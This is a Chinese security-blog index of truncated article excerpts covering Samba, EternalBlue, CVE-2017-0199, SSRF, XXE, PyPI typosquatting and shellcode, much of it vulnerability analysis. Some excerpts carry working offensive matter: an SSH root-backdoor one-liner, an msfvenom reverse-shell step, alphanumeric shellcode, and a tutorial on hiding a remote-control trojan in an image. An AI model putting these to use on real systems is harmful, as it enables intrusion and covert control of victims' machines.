在电影《钢铁侠3》中，我们看到了身穿机械战甲的男主角托尼为了打倒坏人，通过他的电脑智能系统“贾维斯”，一人控制无数台机器人同时作战，最终赢得胜利，迷倒了一片吃瓜群众。而在现实生活中，也有一些人打着微信营销的旗号，研发了一款类似的系统设备，名为“微信群控”。同样是用一个系统控制着多台设备，但不同的是，微信群控所谓的”营销神器”并不是为了什么正义。相反，我们在微信上看到的很多恶意，大部分都是拜它所赐，并衍生出各类黑色产业链。今天，我们就给大家介绍一下微信群控这种微信恶意使用模式：一、微信群控的基本概念了解微信群控，首先要区分“群控”和“微信群控”。“群控”系统是指，通过系统自动化控制集成技术，把多个手机操作界面直接映射到电脑显示器，实现由一台电脑来控制几十台甚至上百台手机的效果。群控系统对中控电脑上每个手机的操作界面进行编号，对应相同编号的手机，从而实现一对一的手机操作控制。“群控”系统通常是由软件和硬件构成，硬件部分包括群控主机、HUB集线器、电脑主机和终端手机；软件部分用支持分控功能的群控系统，在本地局域网环境下即可实现手机群控。（手机+HUB+群控主机演示）而“微信群控”，是在群控系统基础上，针对微信定制化、批量模拟正常个人用户操作的软硬件集成系统。它以群控系统+各种批量模拟脚本的手段，完成微信批量操作，规避微信产品规则，对抗微信安全技术策略,从而实现各种 ...继续阅读 (20)

0x00 前言前几天Samba公开了一个远程代码执行的漏洞，然后各种 POC 也随之出现，exploit-db上也有这样一个 Python 版本的POC: Samba 3.5.0 – Remote Code Execution.直接执行 POC，报错误信息：这种情况非常简单，直接pip install smb就行，但是：好吧，我们还是需要 Google 一下这个smb的 package 名字，最后发现原来是pysmb：最后 POC 终于跑了起来.我们再回过头来看看整个流程，似乎并没有什么地方不对劲。直接说问题所在吧，如果你在2017-05-24到2017-05-31这段时间内执行过pip install smb或者pip download smb， 那么恭喜你，你的名字可能出现在我的绵羊墙上。0x01 试水 (2017-05-23 19:00)第一天，我在 PyPI 上投放了 4 个 evil package:python-dev、mongodb、proxy、shadowsock测试一下不检查 package、随意安装 package 的人有多少。其中所有的内容都是用cookiecutter根据模版cookiecutter-evilpy-package生成。每个 package 都会收集用户的usernamehostnameiphostinfo我选择了 GitHub I ...继续阅读 (20)

0x01．蜜罐整体介绍随着威胁情报的兴起和虚拟化技术的发展，蜜罐技术也得到了新的发展。可以通过虚拟机来实现高交互蜜罐，以及通过docker实现的业务型蜜罐，不再像是以前需要昂贵硬件设备的部署支撑，大大减少了蜜罐的部署成本。蜜罐高保真高质量的数据集把安全人员从以前海量日志分析的繁琐过程中解脱出来，对于蜜罐的连接访问都是攻击信息，并且不再像以前的特征分析具有一定的滞后性，可以用于捕获新型的攻击和方法。360天眼实验室于2016年中旬运营了一套蜜罐系统，发展至今已相对成熟，蜜罐节点遍布世界五大洲，覆盖了20多个国家，涵盖企业服务、工控服务等常见端口。1） 蜜罐部署目前的蜜罐集群集管理、监控、数据收集与分析，实现基本全自动化流程。2） 总体数据量目前我们的蜜罐日志每天以近10W的数量增长。随着蜜罐数量的增加，这个数据还会进一步增长。攻击IP的地理分布图，攻击IP遍布全球，其中东南亚和南美最多。下面是以2016年11月以来的攻击IP每日访问情况。其中来自俄罗斯的某IP日访问日志条数达到88万条。攻击端口统计，可以看出攻击者对哪些端口比较感兴趣，也能在第一时间发现基于某个端口的攻击事件的爆发。比如，通过统计4月份以来的端口访问情况，分别发现在4月中旬和5月中旬有对445端口扫描的小高峰，这与SMB漏洞的爆发不无关系。而基于6881端口的访问存在几次暴增的访问流量，可能跟P2P探测有关。0x02 ...继续阅读 (11)

强撸两道半,noxss栽在了自己的单线程脑回路上。总的来说,蓝猫师父出题是很有诚意的。=================================================================rBlog最简单的一道web但是最后也只有11个解出,可能是因为有一点脑洞吧在源码审计中其实发现了一个SSTI,并不是完全没洞,但是因为是后台利用所以也比较鸡肋根据提示,发现了view里的feed,生成了一个rss订阅页但是删除文章后,这个rss也是会改变的所以这就需要用到自带缓存功能的阅读器了我使用了feedly,获得了flagrCDN比较符合正常思路/但是最后的验证方式有点不合理,单纯作为题目可以理解最后是2个解出(手贱用小号交了二血)登录注册后得到hint no xss或者sqli那么来看业务逻辑/base/new 可以添加一个基础的混合8位字母数字域名而/pro 则允许你添加一个自定义的域名但是所有pro相关的功能都是不允许的,毕竟普通用户那么这时候看到了ticket功能尝试提交一个普通域名,直接提示 免费账户无权进行这个操作那么应该就是要提交pro域名(6位以下)但是过一段时间后提示closed,因为域名不存在一开始的思路是不是跑一下子域名呢dns域传送利用失败,想想也不可能嘛于是上一波subDomainbrute是爆出来了东西,但是提交后,没卵用,仍然提示不 ...继续阅读 (15)

概述2017年5月24日Samba发布了4.6.4版本，中间修复了一个严重的远程代码执行漏洞，漏洞编号CVE-2017-7494，漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。360网络安全中心 和 360信息安全部的Gear Team第一时间对该漏洞进行了分析，确认属于严重漏洞，可以造成远程代码执行。技术分析如官方所描述，该漏洞只需要通过一个可写入的Samba用户权限就可以提权到samba所在服务器的root权限（samba默认是root用户执行的）。从Patch来看的话，is_known_pipename函数的pipename中存在路径符号会有问题：再延伸下smb_probe_module函数中就会形成公告里说的加载攻击者上传的dll来任意执行代码了： 具体攻击过程：构造一个有’/’ 符号的管道名或路径名，如 “/home/toor/cyg07.so”通过smb的协议主动让服务器smb返回该FID后续直接请求这个FID就进入上面所说的恶意流程具体攻击结果如下：尝试加载　“/home/toor/cyg07.so” 恶意so其中so 代码如下(加载时会调用　samba_init_module 导出函数)最后我们可以在/tmp/360sec中看到实际的执行权限(带root权限)解决方案360网络安全响应中心和360信息安全部建议使用受影 ...继续阅读 (24)

前言：总结了一些常见的姿势，以PHP为例，先上一张脑图，划√的是本文接下来实际操作的0x01 漏洞产生以curl为例，漏洞代码为ssrf.phpphp $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $_GET['url']); #curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_HEADER, 0); #curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS); curl_exec($ch); curl_close($ch); ?0x02 利用方式首先查看curl的版本和该版本支持的协议[root@localhost html]# curl -V curl 7.29.0 (x86_64-redhat-linux-gnu) libcurl/7.29.0 NSS/3.21 Basic ECC zlib/1.2.7 libidn/1.28 libssh2/1.4.3 Protocols: dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtsp scp sft ...继续阅读 (17)

背景在Pwn2own 2017 比赛中，苹果的macOS Sierra 和 Safari 10 成为被攻击最多的目标之一。在此次比赛过程中，尽管有多支战队成功/半成功地完成了对macOS + Safari目标的攻破，然而360安全战队使用的漏洞数量最少，而且也是唯一一个通过内核漏洞实现沙盒逃逸和提权，并完全控制macOS操作系统内核的战队。在这篇技术分享中，我们将介绍我们所利用的macOS内核漏洞的原理和发现细节。在Pwn2own 2017中，为了完全攻破macOS Sierra + Safari目标，彻底控制操作系统内核，360安全战队使用了两个安全漏洞： 一个Safari远程代码执行漏洞（CVE-2017-2544）和一个macOS内核权限提升漏洞（CVE-2017-2545)。CVE-2017-2545是存在于macOS IOGraphics组件中的安全漏洞。从互联网上可循的源码历史来看，该漏洞最早在1992年移植自Joe Pasqua的代码，因此这个漏洞已经在苹果操作系统中存在了超过25年，几乎影响苹果电脑的所有历史版本，同时这又是可以无视沙盒的限制，直接从沙盒中攻入内核的漏洞。在我们3月比赛中奖漏洞负责任报告给苹果公司后，苹果已经在5月15日发布的macOS Sierra 10.12.5中修复了该漏洞。寻找浏览器可访问的内核驱动和Windows系统一样，Safari的浏览 ...继续阅读 (12)

维基解密放出的马克隆团队的内部文件中，出现了俄文版excel编辑的痕迹，这是怎么回事？​​​法国总统大选第二轮计票已经结束。中左翼的马克隆获得66%的选票，极右翼的勒庞获得34%的选票。马克隆成为新的法国总统。按县统计的马克隆与勒庞的得票情况，蓝色为马克隆，黄色为勒庞​上图是马克隆（蓝）与勒庞（黄）在法国各地区的得票率分布。目前看来两人的得票率和地区失业率高度相关，特别是在失业率最高的老工业区，勒庞反欧盟、反移民、反全球化的口号最得人心。这与美国总统大选中，中北部锈带区人们的选择高度相似。尽管在事前民调中，马克隆遥遥领先勒庞24%，获胜几乎毫无悬念。但由于有英国脱欧（民调留欧阵营2%领先）和美国特朗普胜选（民调希拉里3%领先）的前车之鉴，所以大家都在等选前会不会有试图改变局面的“意外事件”发生。意外果然如期而至。一、似曾相识的黑客大选前36小时，网上突然出现了多达9GB的马克龙竞选团队的内部电邮和文档。马克隆团队的服务器被攻破，文件被散布到网上​目前尚不清楚这些文件真实性多高。不过，马克龙竞选团队很快就承认内部服务器遭到大规模、有协调行动的黑客攻击，大量邮件被盗取。关注美国大选的朋友，一定会对这种手段感到似曾相识。维基解密曾经披露了美国民主党总部邮件，揭露民主党高层偏袒希拉里、打击桑德斯，挑动了民主党内部矛盾。在川普“抓逼录音门”出来后，维基解密又立刻放出了希拉里竞选委员会主席波德 ...继续阅读 (24)

看到最近这个勒索这么火，手痒啦~这个样本主要应该是靠漏洞传播，刚好合适我的测试环境，所以来测试一下看看各大杀软的主防是否有效。测试的方法照旧是锁库+断网（不再对这个测试方法回复，详情参照我之前的测试贴）。这次用的大部分杀软都锁在2016年12月12日的库，虽然很早很早，但结果依然令人惊讶的好。测试环境：VBox虚拟机，win7英文版SP1（未打补丁），各杀毒软件均采用默认设置，解压后直接双击运行病毒样本下载：http://bbs.kafan.cn/thread-2088985-1-1.html测试结果：防御成功的（会留下一些无害衍生物）：BitDefender Free（20161212）：一声不吭就杀掉了，Kaspersky Internet Security（20161212）：被加密了一些后，主防杀，成功回滚F-Secure Client Security（20161212）：主防杀Dr. Web Anti-Virus（20161212）：启发杀，非常神奇（http://bbs.kafan.cn/thread-2088985-1-1.html的变种也能启发杀）Cybereason RansomFree（20161231，v2.1.1.0）：成功拦截Emsisoft Internet Security（20170104）：智能HIPS杀，Emsisoft与其他杀软相比HIPS性 ...继续阅读 (30)

AppLocker Bypass – InstallUtilheader_scripts 0x001 介绍什么是AppLocker？AppLocker是在Windows Server 2008 R2和Windows 7中推出，它将应用程序控制功能和软件限制原则的功能向前推进。AppLocker包含的新功能和扩充功能可以让你根据档案的唯一识别建立规则来允许或拒绝应用程序执行，并制定哪些使用者或群组可以执行这样应用程序。控制下列類型的應用程式：可執行檔(.exe 和 .com)指令碼(.js、.ps1、.vbs、.cmd 和 .bat)、Windows Installer檔案(.mst、.msi 與 .msp) 和DLL檔案 (.dll、.ocx) 和已封裝應用程式和已封裝應用程式安裝程式 (appx)。根據衍生自數位簽章的檔案屬性來定義規則，包括發行者、產品名稱、檔案名稱以及檔案版本。 例如，您可以根據發行者屬性建立會透過更新持續的規則，或您可以為特定版本的檔案建立規則。指派規則給安全性群組或個別使用者。建立規則例外。 例如，您可以建立一個規則，允許除了登錄編輯程式 (Regedit.exe) 之外的所有Windows處理程序都可以執行。在強制執行原則之前，使用僅稽核模式部署原則並了解其影響。匯入和匯出規則。 匯入和匯出會影響整個原則。 例如，如果您匯出某個原則，也會匯出 ...继续阅读 (31)

近期遇到一个XXE相关问题，多方寻找资料。从OWASP文档中得知，攻击者可以使用受信认应用跳转到其他内部系统，通过http(s)请求或使用CSRF攻击未受保护的内部系统获取内部系统信息。0x01现目前许多XML解析器实现都存在XXE利用。观察如下PHP脚本，其解析XML之后再进行发送，最后将结果返回给用户。将该脚本命名为NEWXXE.php并将其放入我的web根目录下CUSTOM目录中。虽说该脚本并不进行任何操作，但是管它呢，我们只是将其作为一个途径来观察解析器本身的问题。在WEBSVR01中安装该php脚本php $xmlfile = filegetcontents('php://input'); $dom = new DOMDocument(); $dom-loadXML($xmlfile, LIBXMLNOENT | LIBXMLDTDLOAD); $xml = simplexmlimport_dom($dom); $stuff = $xml->stuff;$str = "$stuff \n";echo $str; ?>如果你想自己动手进行测试，可以将上面的脚本放入PHP服务器上(首先确保你已经安装了php-xml) 接下来创建一个包含以下内容的xml文件作为请求发送到服务器，我将其命名为send.txt然后将其从WEBSVR01发送到本地。This is my stuff将 ...继续阅读 (20)

大家好，我是Lionel，今天分享一个干货教程，图片绑定后门，由于过程稍复杂，大家如果有不懂的地方请在下面留言，看到了会回复大家的。首先我们需要几个工具。2.远程工具3.生成图标的网站http://www.ico.la/操作步骤1.    找一张图片，这里我就随便找一张图片。打开网站，我们上传一张图片。选择想要的尺寸，保存图标。保存下来的图标，我们先放着。接下来我们设置生成后门。2.打开远控软件。我们现在要生成一个后门的.exe文件。由于远控软件都不统一，我们根据自己的软件生成就可以了。这是我生成的远控后门。3. 然后我们用BD2.Net Injector来绑定这两个文件。按照图示，依次添加需要的文件（前面已经都生成过了）。然后点√，生成即可。这个就是我们生成的带有后门的图片。我们双击试试效果。Okay，已经上线了。 原文作者：Lionel黑白之道 ...继续阅读 (18)

为什么mail()在PHP中是危险的header_scripts0x001 前言在出现PHP应用程序漏洞的时候，我们报道了Webmailer Roundcube应用CVE-2016-9920中的远程命令执行漏洞。此漏洞允许恶意用户通过Roundcube接口写入电子邮件，在目标服务器上执行任意系统命令。在我们向供应商报告漏洞并发布了博客之后，类似的基于PHP内置mail()函数的安全漏洞也在其他PHP应用中出现。在本篇文章中，我们将看看这些漏洞的共同点，那些安全补丁有问题，以及如何安全的使用mail()。0x002 PHP mail() 函数mail()用于从PHP应用程序发送电子邮件的内置功能。可以通过使用以下五个参数来配置邮件传递。http://php.net/manual/en/function.mail.phpbool mail( string $to, string $subject, string $message [, string $additional_headers [, string $additional_parameters ]] )block_code_end该功能的前三个参数是不言而喻的，较不敏感，因为这些参数不受注入攻击的影响。但是，请注意，如果to参数可以由用户控制，那么可以将垃圾邮件发送到任意地址。0x003 ...继续阅读 (18)

版权声明：本文为博主原创文章，未经博主允许不得转载。0x00 前言在使用outlook的过程中，我意外发现了一个URL：https://webdir.xxx.lync.com/xframe。并在这个页面中发现了一处监听message时间的监听器。通过阅读代码，发现过程如下：（1）接受外界的message，抽取出URL，type（类似于command指令），以及一些data、header等。（2）用这个message中的信息组建一个request对象，并调用了sendRequest方法发送请求。（3）这些还不够，居然还将http响应体通过postMessage(data, “*”)发送了出来。因此，我们可以发送一个恶意的message，并且拿到这个域下请求的返回体，是不是一种“跨域http请求”呢？于是兴奋地去报告给MSRC，结果等了将近一周，被告知，这个webdir.online.lync.com域下是一个公用的域，之所以这样设计是因为任何人都可以访问，于是MSRC说这锅他们那边的产品线不想背，给我一周的时间去证明可以获取敏感数据，否则就要关闭这个issue。但是直觉告诉我，这个功能并不是针对所有用户的，没人会从一个毫无关系的微软的域里面发送请求并获取html页面，即使有接口是开放给开发者的，也不会用到这么曲折的前端交互，因此我打算深入研究一下。0x01 深 ...继续阅读 (20)

多少次，她说是在工作，但是诡异的第六感告诉我们，她在撒谎…究竟她瞒着自己在干什么呢？她到底去了什么地方，又见了哪些人？生活中总是不乏这样的疑问和揣测，毕竟这是个浮躁的时代，在快节奏生活的高压下，「信任」越来越稀缺。手机定位、位置追踪这种需求，在这样的时代背景下悄然壮大。【搜索结果和百度指数反应的需求是最真实的】虽然需求巨大，却碍于市面上的定位方法实施门槛较高，成本不够低，所以一直被诸多诟病。然而就在前天夜里，一个高中死党深夜来电吐苦水，痛诉着自己发现女友的不忠，却不愿放手的现状。其实他早已怀疑女友另有新欢，为了知道真相，方法用尽，其间几次想找我求助，但是碍于尊严不愿开口。最后依靠从网上买来的定位系统，证实了女友的工作、睡觉，其实都是与他人幽会的借口。压抑的听完朋友的惨痛经历，久久难以入眠，她不像是那种女生啊，会不会是弄错了呢？这定位靠不靠谱啊？于是我找他要来了这个系统，看看到底是不是真的，别错怪了人家。定位到底是不是真的？【外星科技寻亲定位…】系统的功能是分享文章或者发红包，只要对方打开，就可以获取到对方的定位。文章的内容涉猎广泛，完全可以根据对方的口味来设置自己的“鱼饵”，合适的饵才能钓上想吊的鱼。再分享给要定位的对象，微信/QQ/短信都可以，因为只是一个链接。打开链接，会询问是否同意使用当当前位置。点击其中一个选项就会展现出文章内容，整个过程和打开普通的 ...继续阅读 (28)

前言子域枚举是找到一个或多个子域的有效（解析的域名）过程。除非DNS服务器公开完整的DNS域列表（域传送漏洞），否则很难获取现有的子域列表。通常的做法是使用字典，尝试暴力破解发现。虽然这种方法在某些情况下很有效，但它不包括具有奇怪名称的子域名（如：thornsshitianxiadiyishuai.baidu.com）。另一种方法是抓取二级域以便查找子域的链接（更快的方法是直接使用搜索引擎）。子网枚举使网络信息收集阶段最重要的部分。攻击者收集完整的列表，在其找到弱点，例如访问内部网络。实例：完成子域名枚举后，攻击者将查找blog.example.com。并发现该博客正在使用WordPress作为管理系统。攻击者运行wpscan以找到WordPress漏洞。幸运的是，目标WordPress实例使用了一个易受攻击的插件，攻击者可以利用它，获取对环境的访问权，进一步到内部网络离。这个例子可能有点夸张，但是，这是真实发生的事情。（https://www.wordfence.com/blog/2016/04/panama-papers-wordpress-email-connect）现在我们来介绍最流行的开源工具和技术，用来执行子域枚举。开始了：区域转移最简单和最基本技术是直接在DNS服务器上尝试AXFR请求：dig @ns.example.com example=.com AXFR区域传输 ...继续阅读 (26)

在当今这个节奏逐渐变快的社会，人们对获取信息的效率有着急切的需求。而各式各样的排行榜成为获取信息、做出选择最简单迅速的依据。找电影可以上豆瓣电影排行榜查，听音乐可以看各种排行榜，买东西可以按销量排序。而如今的应用市场上，应用数量浩如烟海，排行榜成为极为重要的曝光渠道。而对开发商而言，应用想被用户看到，刷榜是个高性价比的选择。和安卓不同，封闭的 iOS 平台上，App Store 是唯一的应用商店，这也使它的刷榜问题极为严重。尽管苹果近年不留余力地打击刷榜现象，但总有漏洞让这条灰色产业链顽强地存在。前几年，网络上流传着这样一张图，刷榜人员使用上百台 iPhone 完成 iOS 应用的下载使用，达到刷榜的目的。不过，这样的刷榜方式需要价格不菲的硬件设备投入，需要注册数量巨大的苹果账号和绑定支付工具，在 App Store 应用和用户不断激增的今天，这种刷榜方式显得力不从心。近年一种新的刷榜方式悄然出现并盛行，此文将以网上很火的“钱咖”为例，为你揭秘这种利用用户完成的刷榜方式。◆◆◆  ◆  ◆刷榜的具体步骤这种方式通常的套路是刷榜公司以赚钱为噱头诱导用户安装它们开发的软件，用户打开软件会看到各种应用刷榜任务。这些任务要求用户在 App Store 根据关键词搜索找到指定的应用安装并使用，后台软件检测到任务完成后向刷榜用户的账户内打入奖励资金。1安装应用监测软件在 iPhone 手机上进 ...继续阅读 (23)

关于sicklepoc早在去年，我就做了一款扫描器。包含对子域名的收集，邮件收集，爬虫检测漏洞模块之类的，只是没有公开。当我腾出精力来做sickle的时候，我对sickle的理解是poc扫描+web2.0爬虫。为了提高复用性，我决定把poc和crawler分开来，并且做成了分布式部署的模式。这样做带来的好处太明显了，支持无限台机器扫描，你的机器越多，面对众多扫描目标时，扫描起来也毫不费力。sicklepoc当然这只是一个sickle项目中的一部分。sicklepoc是一个单纯的poc扫描框架。现在poc扫描有很多，pocscan,scan-t,迅风之类的，太多太多。sicklepoc，你可以把它理解为一个插件扫描器。整个过程：输入目标->扫描->出报告。关于sickle关于sickle，是一个集资产收集，poc，爬虫扫描的工具。插件式的扫描模式对于后期拓展漏洞检测能力帮助实在是太大了。分布式的部署可以大大提高扫描的速度，这个东西不会开源。不过sickle的衍生版flycat后期会开源。关于flycat详情可以参考http://www.codersec.net/2017/02/flycat%E7%B3%BB%E7%BB%9F%E7%9A%84%E9%9A%8F%E6%83%B3/ 由于第一版的flycat采用的是ssh框架，struts2漏洞太多了，在第二版的时候，我换成了sprin ...继续阅读 (28)

记录一下过程，周日已经出了结果，但是过程忘记了，抽空再次实现了一下。结尾附上利用MSF生成exploit（外国黑客城会玩）。准备工作一台apache服务器（这里我用Kali）、POC和一个Word文档。 POC内容大概如下：a=new ActiveXObject("WScript.Shell"); a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close();Word文档内容任意。然后将其放在Kali服务器上 Apache需要开启DAV支持，具体命令如下a2enmod dav a2enmod dav_fs a2enmod dav_lock a2enmod headers测试过程在web目录新建ms文件夹，将test.docx复制到ms目录下，并重命名为test.rtfroot@kali:~/Documents# cp test.docx /var/www/html/ms/test.rtf新建Word文档，插入对象 如图并保存为rtf文件，如233.rtf 删除服务器上的test.rtf文件 并将poc.hta文件复制到ms目录下，并改名为test.rtfroot@kali:/var/www/html/ms# rm -rf test.rtf root@kali:~/Documents# cp poc.hta /v ...继续阅读 (33)

国内的安全专家最近发现一种新的钓鱼攻击，“几乎无法检测”，即便平时十分谨慎的用户也可能无法逃过欺骗。黑客可利用Chrome、Firefox和Opera浏览器中的已知漏洞，将虚假的域名伪装成苹果、谷歌或者亚马逊网站，以窃取用户的登录凭证、金融凭证或其他敏感信息。防钓鱼的最佳方式是什么？一般来讲，我们会在页面加载出来后检查地址栏，看看地址是否由有效的HTTPS连接提供。对吧？ 那么，在继续深入之前，我们来看看这个页面。页面是由发现这一攻击的中国安全研究员Xudong Zheng创建的，点击去看看。如果你的浏览器显示的地址是“apple.com”，并有SSL安全认证的，但是页面内容却来自另一个服务器（如上图所示），那么你的浏览器就易遭受“同形异义字攻击”。Wordfence的安全专家们也创建了另一个PoC网站，展示了同一个漏洞；这个网站仿冒的是“epic.com”的域。用Chrome、Firefox来访问，看看是不是很神奇？同形异义字攻击自2001年以来就已为人所知，但是浏览器厂商修复该问题的过程却很艰难。这种欺骗攻击就是网址看起来是合法的，但实际上不是，因为其中的一个字符或者多个字符已经被Unicode字符代替了。 许多Unicode字符，代表的是国际化的域名中的希腊、斯拉夫、亚美尼亚字母，看起来跟拉丁字母一样，但是计算机却会把他们处理成完全不一样网的网址。 比如说，斯拉夫字母“а” ...继续阅读 (29)

首先是说说之前爆的那个注入,相比大家都很头疼就算有注入如果不是root我也解密不了所以我就想着能不能挖一个任意文件下载之类的漏洞然后拿到phpcms的key这样就可以利用注入伪造信息进入后台了。 漏洞文件:/phpcms/modules/content/down.php文下执行了file_down,我们跟入看看function file_down($filepath, $filename = '') { if(!$filename) $filename = basename($filepath); if(is_ie()) $filename = rawurlencode($filename); $filetype = fileext($filename); $filesize = sprintf("%u", filesize($filepath)); if(ob_get_length() !== false) @ob_end_clean(); header('Pragma: public'); header('Last-Modified: '.gmdate('D, d M Y H:i:s') . ' GMT'); header('Cache-Control: no-store, no-cache, must-revalidate'); ...继续阅读 (32)

环境EXPLOIT:Eternalblue-2.2.0.exeTARGET:win7 sp1 32bitssrv.sys 6.1.7601.17514srvnet.sys 6.1.7601.17514PATCH:MS17-010漏洞原理srv.sys在处理SrvOs2FeaListSizeToNt的时候逻辑不正确导致越界拷贝。我们首先看下漏洞的触发点：unsigned int __fastcall SrvOs2FeaToNt(int a1, int a2) { int v4; // edi@1 _BYTE *v5; // edi@1 unsigned int result; // eax@1 v4 = a1 + 8; *(_BYTE *)(a1 + 4) = *(_BYTE *)a2; *(_BYTE *)(a1 + 5) = *(_BYTE *)(a2 + 1); *(_WORD *)(a1 + 6) = *(_WORD *)(a2 + 2); _memmove((void *)(a1 + 8), (const void *)(a2 + 4), *(_BYTE *)(a2 + 1)); v5 = (_BYTE *)(*(_BYTE *)(a1 + 5) + v4); *v5++ = 0; _memmove(v5, (const void *)(a2 + 5 + *(_BYTE ...继续阅读 (50)

版权声明：本文首发于微信号：inn0team此文章版权归属于 inn0team 所有转载请务必保留此声明，违者必究。 系统环境攻击机 192.168.108.129win7 32bit 旗舰版python-2.6.6.msihttps://www.python.org/download/releases/2.6.6/pywin32-221.win32-py2.6.exehttps://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/攻击机2 192.168.108.131Kali 2靶机 192.168.108.132win7 64bit 旗舰版关闭系统防火墙https://github.com/misterch0c/shadowbroker下载解压切换到windows目录执行fb.py看fb.py发现是遍历目录的时候出错了，发现缺少listeningposts目录 创建一个listeningposts目录再次运行fb.py创建一个攻击项目这里要选择SMB和 对应的目标操作系统位数 下面的话是攻击的4个操作 选择RunDLL这里用攻击机2 kali的msfvenom 生成一下dll 这里使用的是reverse_tcp的paylaod 可以根据网络情况采用其他payload$ msfvenom -p windows ...继续阅读 (47)

Pwnhub（pwnhub | Beta），中文解释‘破解中心’，谐音胖哈勃，一个以各种安全技术为内容的竞赛平台。从去年12月初上线到现在，已经稳定运行了4个月，主办了10场比赛。作为一篇安全技术向的文章，我们不谈情怀，不谈运营，单说说Pwnhub的开发，我遇到过哪些（安全）暗坑，以及怎么去规避。本文主要从微信模块安全、API安全、权限控制、前端安全、商城逻辑安全、运维安全等几个方面来介绍Django的安全编码。由于我们公司的 Web 技术栈是 Vue+Django，采用纯 SPA 异步通信模式，选型上自然没有任何难度，很快前后端配合开始了工作。微信模块安全Django框架的优势之一就是其自带的用户模块，我们可以用少量代码搭建整体用户逻辑，包括用户登录、找回密码、权限控制等。但因为Pwnhub在选型的时候就确定使用微信登录，所以用户逻辑方面势必需要进行一些改造。我的做法是前台砍掉Django的用户登录大部分所有逻辑，包括：注册、登录、找回密码、修改密码，仅留下一个退出登录，然后自己做了微信登录相关的代码逻辑。任何一个与微信相关的应用，想保证与微信间的通信，需要注意以下4个变量：应用ID AppID应用密钥 AppSecret通信令牌 Token消息加密密钥 EncodingAESKey其中，必须配置的前三者，后者可以不用配置；必须保密的是后三者，前者可以公开。应用IDAppID和应 ...继续阅读 (20)

#include#include//纯字符数字的shellcode，显示个calc char aphal1[]={"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIxkVvqKRJ31PXrsOKtMFEk6cL9oKcFQIPPPmkFrHKNaQlYoXSjHIu9oyokOsSu1RLasfNQuPxPegps0A"}; int main(int argc, char **argv) { __asm { lea esp,aphal1 jmp esp } return 0;上面是一个纯数字字母的shllcode，运行一个calc.exe程序shllcode的（纯字符数字）编码主要是base16和Alpha2里面的// Alpha2.cpp : Defines the entry point for the console application. // #include// printf(), fprintf(), stderr #include// exit(), EXIT_SUCCESS, EXIT_FAILURE, srand(), rand() #include// strcasecmp(), strstr() #include//struct timeval, struct ...继续阅读 (28)

漏洞文件:/member/index.php$M_MODULE='web'; if(@$_GET['m'])$M_MODULE=$_GET['m']; if(@!$_GET['n'])$_GET['n']="user"; if(@!$_GET['c'])$_GET['c']="profile"; if(@!$_GET['a'])$_GET['a']="doindex"; @define('M_NAME', $_GET['n']); @define('M_MODULE', $M_MODULE); @define('M_CLASS', $_GET['c']); @define('M_ACTION', $_GET['a']); require_once '../app/system/entrance.php'; 我这里简单的说明一下这里的功能处,这里是为了调用class文件先跟入entrance if (!defined('M_MODULE')) { define ('M_MODULE', 'include'); define ('M_CLASS', $_GET['c']); define ('M_ACTION', $_GET['a']); } //µ±Ç°Îļþ¼ÐµØÖ· if(M_TYPE == 'system'){ if(M_MODULE == 'inclu ...继续阅读 (29)

在Centos 7 上编译安装openssl后，运行openssl version出现如下错误：openssl: error while loading shared libraries: libssl.so.1.1: cannot open shared object file: No such file or directory这是由于openssl库的位置不正确造成的。解决方法：在root用户下执行：ln -s /usr/local/lib64/libssl.so.1.1 /usr/lib64/libssl.so.1.1 ln -s /usr/local/lib64/libcrypto.so.1.1 /usr/lib64/libcrypto.so.1.1注：小编在配置服务器时候遇到这一问题，网上部分文章的方法是错的，本文内容经过试验成功，特意分享一下。【via@code-world】 ...继续阅读 (37)

1.1   起因今天在搜索关于Linux下的后门姿势时，发现一条命令如下：软链接后门：ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;经典后门。直接对sshd建立软连接，之后用任意密码登录即可。ssh root@x.x.x.x -p5555这个是大家也经常会用到的命令，但是在好奇心的驱使下，为什么任意密码就可以了？于是搜索了相关的资料，发现都是执行了这条命令就可以免密码登录了，但是为什么却没有一篇详细的解答。1.2   调查首先测试一下这个命令：在A的机器上执行了如下命令：ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=5555;在B机器SSH登录A机器，输入任意密码，成功登录。先理解这条命令主要在做什么：首先，做一个软链接，结果在/tmp/su  参数的意义： -o option  -p port这样就开启了一个端口为5555的服务：测试过程中发现，只允许命名为su，命名其他尝试登录都不成功(/tmp/xxx)。于是看了一下sshd相关的log，发现如下：发现是基于pam认证的，使用了pam中的su，为了区分是否和/bin/中的su是否相关，做了测试如下：把/bin/su 重新命名为其他文件，发现依然能够任意密码登录，又做了测试如下：cp /etc/pam.d/su /etc/pam ...继续阅读 (39)

/member/include/inc_shop.phpif($if_corp == 1){ if($ac == 'base'){ if(empty($tname)) write_msg('','?m=shop&type;=corp&error;=39'); if(empty($areaid)) write_msg('','?m=shop&type;=corp&error;=40'); $db -> query("UPDATE `{$db_mymps}member` SET tname='$tname',catid='$catids',areaid='$areaid',introduce='$introduce',address='$address',busway='$busway',mappoint='$mappoint',msn='$msn',web='$web' $where AND if_corp = '1'"); write_msg('','?m=shop&type;=corp&success;=13'); } elseif($ac == 'template') { if($_FILES[$name_file]['name']){ require_once MYMPS_INC.'/upfile.fun.php'; ...继续阅读 (31)

private void xaef3235cdd23255e() { string text = base.Server.UrlDecode(base.Request.Form["cid"]); while (true) { IL_3E0: string str = base.Server.UrlDecode(base.Request.Form["aid"]); string text2 = "{\"result\":"; bool flag; string[] array; if (string.IsNullOrEmpty(text)) { if (false) { break; } goto IL_26; } else { if (int.Parse(text) <= 0) { goto IL_26; } flag = true; if ((flag ? 1u : 0u) >= 0u) { text2 += "1,\"data\":["; array = new string[5]; array[0] = "select e.ID,eName,vName,eCss from wqcms_expand e left join wqcms_extval v on v.eID=e.ID where nID="; array[1] = WbText.SqlEncode(str); go ...继续阅读 (36)